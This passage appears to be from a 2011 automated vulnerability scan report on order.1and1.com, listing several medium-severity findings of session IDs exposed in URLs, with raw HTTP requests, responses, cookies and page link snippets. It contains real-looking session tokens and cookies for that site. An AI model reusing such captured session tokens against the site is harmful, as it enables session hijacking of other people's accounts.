Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Found
Date: Sun, 20 Mar 2011 18:53:27 GMT
Server: Apache
Location: http://order.1and1.com/links/?__frame=_top&__lf=Static
Vary: Accept-Encoding
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://order.1and1.com/links/?__frame=_top&amp;
...[SNIP]...

3.2. http://order.1and1.com/xml/order

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632652217
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: variant.configname=2010-04-14; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
Set-Cookie: UT=Ra2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSseJ1dgPTAxLSwxLSsuLCYuJSQ=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


3.3. http://order.1and1.com/xml/order/AboutUs

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/AboutUs

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/AboutUs;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.about HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:36:07 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/AboutUs?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.about
Content-Length: 0
Connection: close
Content-Type: text/plain


3.4. http://order.1and1.com/xml/order/CloudDynamicServer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:22 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1MjAwLy0rLTA=; Expires=Fri, 07-Apr-2079 21:07:29 GMT; Path=/
ETag: 9efbb6be51ecd3a77db1d7f5b7bc91f5
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63287


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=CloudDynamicServer&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=CloudDynamicServer&amp;page=switch&amp;linkOrigin=CloudDynamicServer&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.tab.vps" rel="button-hd-tab-vps"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.tab.serverpremium" rel="button-hd-tab-serverpremium"><span>
...[SNIP]...
<p>Mobile monitoring of your server availability any time with
<a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoringCloud;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff"><strong>
...[SNIP]...
<span class="osLinux"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerDedOsLinuxOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<span class="osWindows"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerDedOsWindowsOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoringCloud;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details
</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerProcessor;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerDedOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerDedOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerDedOsWindowsOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerDedOsLinuxOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsSB;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerRecovery;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerSsl;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerFirewall;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureWebdesignIstock;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
</ul><a rel="height=480, width=665" class="btn btn-detail-lightblue window-open" href="/xml/order/popupServerOsCds;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">
Details
</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
</p><a rel="height=480, width=643" class="window-open" href="/xml/order/popupPayPalInfo;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
<p>*Offers valid for a limited time only. "3 Months Free" offer valid on the Base Configuration only, with a 12 month minimum contract term. Setup fee and other terms and conditions may apply. <a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=CloudDynamicServer&amp;linkOrigin=CloudDynamicServer&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.5. http://order.1and1.com/xml/order/CloudDynamicServer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:22 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1MjAwLy0rLTA=; Expires=Fri, 07-Apr-2079 21:07:29 GMT; Path=/
ETag: 9efbb6be51ecd3a77db1d7f5b7bc91f5
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63287


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.6. http://order.1and1.com/xml/order/Contact

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Contact

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Contact;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.support HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Contact?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.support
Content-Length: 0
Connection: close
Content-Type: text/plain


3.7. http://order.1and1.com/xml/order/Domaininfo

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Domaininfo

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Domaininfo;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
